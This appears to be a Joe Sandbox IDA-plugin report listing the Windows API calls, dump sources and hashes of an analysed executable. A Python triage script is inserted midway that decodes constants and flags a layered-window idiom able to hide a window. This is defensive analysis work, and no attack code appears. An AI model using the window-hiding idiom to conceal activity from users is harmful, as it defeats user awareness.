                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2759813231-0
                                                                                                                                                                              • Opcode ID: 1090931b58cc25d744cfdbca1642062e04099681eca1fe5363aea08d07c2a272
                                                                                                                                                                              • Instruction ID: ee91b782099245243d8f2768c1bf0c582d30ce8a3ef1dbea4dfb7e4debcc0b90
                                                                                                                                                                              • Opcode Fuzzy Hash: 1090931b58cc25d744cfdbca1642062e04099681eca1fe5363aea08d07c2a272
                                                                                                                                                                              • Instruction Fuzzy Hash: 3D3192B1D00109AFC700DFA6CC85CAEBBFCEF48304B10446AE515E7251D7709E45CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0E8E2
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0E8F9
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0E924
                                                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E0E92F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3763101759-0
                                                                                                                                                                              • Opcode ID: fed74937b3d4bda380d3437d8e9bf9af3a97a1b03fb98b9b0eba71aaf42d0669
                                                                                                                                                                              • Instruction ID: d57a6a3123cca4142f06f1c7e47cff97327a8de19d78f05f94414fa0196c0c0e
                                                                                                                                                                              • Opcode Fuzzy Hash: fed74937b3d4bda380d3437d8e9bf9af3a97a1b03fb98b9b0eba71aaf42d0669
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21A371900215EFCB14AFA4D982BAEB7B8EF95750F144069F804BB381D6709E41CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,00E3DC30), ref: 00E0DBA6
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E0DBB5
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E0DBC4
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E3DC30), ref: 00E0DC21
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2267087916-0
                                                                                                                                                                              • Opcode ID: afdee62dce6eb73cba25b8abf6fa4ef6ea5fa75356cb81b20b3059b54b943579
                                                                                                                                                                              • Instruction ID: d5866900a99b094f7bbc8cd83f4d6b483ce5662e869f3b838ce0471ce95f06f9
                                                                                                                                                                              • Opcode Fuzzy Hash: afdee62dce6eb73cba25b8abf6fa4ef6ea5fa75356cb81b20b3059b54b943579
                                                                                                                                                                              • Instruction Fuzzy Hash: A121803150C3059FD700DF68DC849ABBBE8EF56368F105A19F499A32E1D730D98ACB52
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E332A6
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E332C0
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E332CE
                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E332DC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2169480361-0
                                                                                                                                                                              • Opcode ID: 3d4071bea38250656f2dd02b715392fd57f12964fb36fb255bfda213544362fa
                                                                                                                                                                              • Instruction ID: 21c3dd5131ed60b2e234a62b1ccf75f378494fb553fa507e6d3bc78d3f24b703
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d4071bea38250656f2dd02b715392fd57f12964fb36fb255bfda213544362fa
                                                                                                                                                                              • Instruction Fuzzy Hash: 3921C431208111AFD7149B24CC49FAB7FA5EF81324F248259F8269B2E2C771ED41CBD0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E096E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E08271,?,000000FF,?,00E090BB,00000000,?,0000001C,?,?), ref: 00E096F3
                                                                                                                                                                                • Part of subcall function 00E096E4: lstrcpyW.KERNEL32(00000000,?,?,00E08271,?,000000FF,?,00E090BB,00000000,?,0000001C,?,?,00000000), ref: 00E09719
                                                                                                                                                                                • Part of subcall function 00E096E4: lstrcmpiW.KERNEL32(00000000,?,00E08271,?,000000FF,?,00E090BB,00000000,?,0000001C,?,?), ref: 00E0974A
                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E090BB,00000000,?,0000001C,?,?,00000000), ref: 00E0828A
                                                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,00E090BB,00000000,?,0000001C,?,?,00000000), ref: 00E082B0
                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E090BB,00000000,?,0000001C,?,?,00000000), ref: 00E082EB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                              • String ID: cdecl
                                                                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                                                                              • Opcode ID: ddbe94e423daaa28ce63c69107333ecbf9c52db2055e74b295bfb7ead64178c5
                                                                                                                                                                              • Instruction ID: 1b827e139d6e3a10d4629db45cc447d15ee6ad1c6f267683431a24e1818a17cb
                                                                                                                                                                              • Opcode Fuzzy Hash: ddbe94e423daaa28ce63c69107333ecbf9c52db2055e74b295bfb7ead64178c5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5411263A200342AFCB149F78DC45E7A77E9FF85754B10512AF982D72A4EF319851C7A0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E3615A
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E3616C
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E36177
                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E362B5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 455545452-0
                                                                                                                                                                              • Opcode ID: 4c9a799b3a914db8eab2369bbea4c102fe250817b1e08c1e96a4508c23fd9823
                                                                                                                                                                              • Instruction ID: 3f4f8f6c50ab88ba18be1e14c31d8d75445657f7e9a30603b529b5238e70418c
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c9a799b3a914db8eab2369bbea4c102fe250817b1e08c1e96a4508c23fd9823
                                                                                                                                                                              • Instruction Fuzzy Hash: 3011D336600208AADB10EF659C88EEF7FBCEB51354F14902AFA15F6182EB70C944CB70
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a925b67b660a3903b361390104d0f8501e5514413d17bf1364360a08fab43a55
                                                                                                                                                                              • Instruction ID: 783737972ce36b23caef390737830366db393c78bea7d694329e88ef9a1980ca
                                                                                                                                                                              • Opcode Fuzzy Hash: a925b67b660a3903b361390104d0f8501e5514413d17bf1364360a08fab43a55
                                                                                                                                                                              • Instruction Fuzzy Hash: 67014FB22092167FE72126B97CC1F77660DDFA13B8B384727B521A13D5DA608D449570
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E02394
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E023A6
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E023BC
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E023D7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: faf9d1c754344442f0197b698d02588571823ba5508e247bac46724600040b11
                                                                                                                                                                              • Instruction ID: 3a43188f4ed255d45c6115758c48ac5ccd73257dae069800f6b9001736a1c7b2
                                                                                                                                                                              • Opcode Fuzzy Hash: faf9d1c754344442f0197b698d02588571823ba5508e247bac46724600040b11
                                                                                                                                                                              • Instruction Fuzzy Hash: 5611393A900219FFEF119BA5CD89F9DBBB8FB08754F200095EA00B7290D6756E50DB94
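The function summaries above give each call's immediates as raw hex (000000EC, 00000002, 000000B0, 00001060) and leave the reader to decode them. As an added example, not part of the Joe Sandbox report, the Python below parses these "APIs" lines, substitutes the winuser.h/commctrl.h names for the immediates that occur in this section, and flags the GetWindowLongW/SetWindowLongW(GWL_EXSTYLE) followed by SetLayeredWindowAttributes(LWA_ALPHA) sequence from the second function listed. The line grammar, the assumption that the report prints imm8-pushed negatives by their low byte (000000EC for GWL_EXSTYLE, 000000FF for INFINITE), and the two sample inputs (copied from the listings above) are this example's own, not Joe Sandbox's.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# An argument as the report prints it: an 8-digit hex immediate, a string
# literal (e.g. "cdecl"), or "?" when the sandbox could not resolve it.
Arg = Union[int, str, None]

# One "• Func.MODULE(args), ref: ADDR" line of a Joe Sandbox function summary;
# the "Part of subcall function X:" prefix and the argument list are optional.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Symbolic names for the immediates seen in this report section (winuser.h /
# commctrl.h values). Assumption: the report prints imm8-pushed negatives by
# their low byte (000000EC for GWL_EXSTYLE = -20, 000000FF for INFINITE = -1),
# so window-long indexes are matched on the low byte.
WINDOW_LONG_INDEX = {0xF0: "GWL_STYLE", 0xEC: "GWL_EXSTYLE"}
LWA_FLAGS = {0x1: "LWA_COLORKEY", 0x2: "LWA_ALPHA"}
WINDOW_MESSAGES = {
    0x00B0: "EM_GETSEL", 0x00C9: "EM_LINEFROMCHAR",
    0x1002: "LVM_GETIMAGELIST", 0x1060: "LVM_SETCOLUMNW",
}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Arg]
    ref: int                         # address of the call site
    subcall: Optional[int] = None    # set for "Part of subcall function" lines


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one bullet line; returns None for headers such as 'APIs' or 'Strings'."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["func"], m["mod"], args, int(m["ref"], 16), sub)


def parse_block(text: str) -> List[ApiCall]:
    return [c for c in map(parse_api_line, text.splitlines()) if c]


def describe(call: ApiCall) -> str:
    """Render a call with symbolic names substituted for known immediates."""
    a = list(call.args)
    if call.func in ("GetWindowLongW", "SetWindowLongW") and len(a) > 1 and isinstance(a[1], int):
        a[1] = WINDOW_LONG_INDEX.get(a[1] & 0xFF, a[1])
    elif call.func == "SetLayeredWindowAttributes" and len(a) > 3 and isinstance(a[3], int):
        a[3] = LWA_FLAGS.get(a[3], a[3])
    elif call.func == "SendMessageW" and len(a) > 1 and isinstance(a[1], int):
        a[1] = WINDOW_MESSAGES.get(a[1], a[1])
    shown = ", ".join("?" if x is None else x if isinstance(x, str) else f"0x{x:X}" for x in a)
    return f"{call.func}({shown})"


def flags_layered_window(calls: List[ApiCall]) -> bool:
    """True when a function reads GWL_EXSTYLE, writes it back and then calls
    SetLayeredWindowAttributes with LWA_ALPHA: the WS_EX_LAYERED idiom for a
    translucent window, which with alpha 0 leaves a window present but invisible."""
    seen = set()
    for c in calls:
        a = c.args
        if c.func in ("GetWindowLongW", "SetWindowLongW") and len(a) > 1 \
                and isinstance(a[1], int) and a[1] & 0xFF == 0xEC:
            seen.add(c.func)
        if c.func == "SetLayeredWindowAttributes" and len(a) > 3 and a[3] == 2:
            seen.add(c.func)
    return {"GetWindowLongW", "SetWindowLongW", "SetLayeredWindowAttributes"} <= seen


# Constructed sample input: the "APIs" lines of two function summaries copied
# from this report section.
LAYERED_WINDOW_FUNC = """\
• GetWindowLongW.USER32(?,000000EC), ref: 00E332A6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E332C0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E332CE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E332DC
"""
MKDIR_FUNC = """\
• GetFileAttributesW.KERNEL32(?,00E3DC30), ref: 00E0DBA6
• GetLastError.KERNEL32 ref: 00E0DBB5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00E0DBC4
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E3DC30), ref: 00E0DC21
"""

if __name__ == "__main__":
    for name, text in (("layered window", LAYERED_WINDOW_FUNC), ("mkdir", MKDIR_FUNC)):
        calls = parse_block(text)
        print(f"[{name}] layered-window idiom: {flags_layered_window(calls)}")
        for c in calls:
            print(f"  {c.ref:08X}  {describe(c)}")
```

Run as a script it prints the decoded calls for both samples. The flag is a triage hint, not a verdict: the alpha argument to SetLayeredWindowAttributes is `?` in the report, so whether the window is made fully invisible (alpha 0) or merely translucent cannot be read from these lines alone; the call site at 00E332DC in the dump is where to look.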
APIs
• GetCurrentThreadId.KERNEL32 ref: 00E0EB14
• MessageBoxW.USER32(?,?,?,?), ref: 00E0EB47
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E0EB5D
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E0EB64
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: c2860f79b10b9021194e1cdf614a1fe34cfe80c2a614a0bbb3e2844e3e6ed081
                                                                                                                                                                              • Instruction ID: 9dd8b6a0270dd173356fca7c925e32515b7c59955195c76e18ad76923f5223f0
                                                                                                                                                                              • Opcode Fuzzy Hash: c2860f79b10b9021194e1cdf614a1fe34cfe80c2a614a0bbb3e2844e3e6ed081
                                                                                                                                                                              • Instruction Fuzzy Hash: 42112B72904259BFC711DBA99C0AADE7FADEB45314F00426AF915F33D0D6748D488B60
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,?,00DCD369,00000000,00000004,00000000), ref: 00DCD588
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DCD594
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00DCD59B
                                                                                                                                                                              • ResumeThread.KERNEL32(00000000), ref: 00DCD5B9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 173952441-0
                                                                                                                                                                              • Opcode ID: 0c8be5be6a680b94f1bcf48c71897fe0904c3593565b60543e44aaba82be3ebd
                                                                                                                                                                              • Instruction ID: c615f3b40a674cea6f123f55ebb72147046b9d1ab11a1c9f38df78b3768f9343
                                                                                                                                                                              • Opcode Fuzzy Hash: 0c8be5be6a680b94f1bcf48c71897fe0904c3593565b60543e44aaba82be3ebd
                                                                                                                                                                              • Instruction Fuzzy Hash: EE01D6324141167FCB106FA5EC09FAA7B6AEF42734F24022DF925971E0DB708805C6B1
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA78B1
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00DA78C5
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA78CF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3970641297-0
                                                                                                                                                                              • Opcode ID: c386d98ebb2aa620332170ead4c3b4b4d180bf621f65b4d760a8ef1a12c67e6a
                                                                                                                                                                              • Instruction ID: 38ec2d1d8dc43888a05502db0abaf742edac2f9211d89abfdaab3cc293b4f307
                                                                                                                                                                              • Opcode Fuzzy Hash: c386d98ebb2aa620332170ead4c3b4b4d180bf621f65b4d760a8ef1a12c67e6a
                                                                                                                                                                              • Instruction Fuzzy Hash: A911AD72505148BFDF065FA1DC58EEA7B69FF093A4F080116FA0462120D739DC60EBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00DD338D,00000364,00000000,00000000,00000000,?,00DD35FE,00000006,FlsSetValue), ref: 00DD3418
                                                                                                                                                                              • GetLastError.KERNEL32(?,00DD338D,00000364,00000000,00000000,00000000,?,00DD35FE,00000006,FlsSetValue,00E43260,FlsSetValue,00000000,00000364,?,00DD31B9), ref: 00DD3424
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DD338D,00000364,00000000,00000000,00000000,?,00DD35FE,00000006,FlsSetValue,00E43260,FlsSetValue,00000000), ref: 00DD3432
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                              • Opcode ID: 51b15ec63ab76cee66c8d37f61f515f8e1040ec82c57daafcdcb46c3c129a1eb
                                                                                                                                                                              • Instruction ID: d090da3ff0716d972ec20fea0866f9f8bff8060e8a18e013fac42f728295ca8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 51b15ec63ab76cee66c8d37f61f515f8e1040ec82c57daafcdcb46c3c129a1eb
                                                                                                                                                                              • Instruction Fuzzy Hash: 6F01F7326553269FCB228B7AAC489577B58BF05B717280225F946E3381C725DD05C6F1
                                                                                                                                                                              APIs
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E0B69A,?,00008000), ref: 00E0BA8B
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E0B69A,?,00008000), ref: 00E0BAB0
